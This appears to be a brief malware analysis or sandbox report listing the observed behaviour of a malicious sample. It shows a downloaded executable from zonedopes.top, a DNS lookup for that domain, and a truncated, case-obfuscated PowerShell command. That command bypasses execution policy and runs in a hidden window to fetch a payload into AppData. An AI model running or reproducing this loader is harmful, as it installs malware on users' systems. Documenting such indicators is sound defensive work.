Technical Information
- http://www.zonedopes.top/red.php?f=1.gif as %appdat%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwerShELL.ExE -EXEcUTionPolICY BYpsS -noprofiLe -WInDoWsTyLE hIDDen (NEW-ObJECt sYstem.NeT.WeBClIEnt).doWNloADFilE('http://www.zonedopes.top/red.php?f=1.gif','%AppdA...
- DNS ASK zo###opes.top
- '<SYSTEM32>\cmd.exe' /c "pOwerShELL.ExE -EXEcUTionPolICY BYpsS -noprofiLe -WInDoWsTyLE hIDDen (NEW-ObJECt sYstem.NeT.WeBClIEnt).doWNloADFilE('http://www.zonedopes.top/red.php?f=1.gif','%AppdA...' (with hidden window)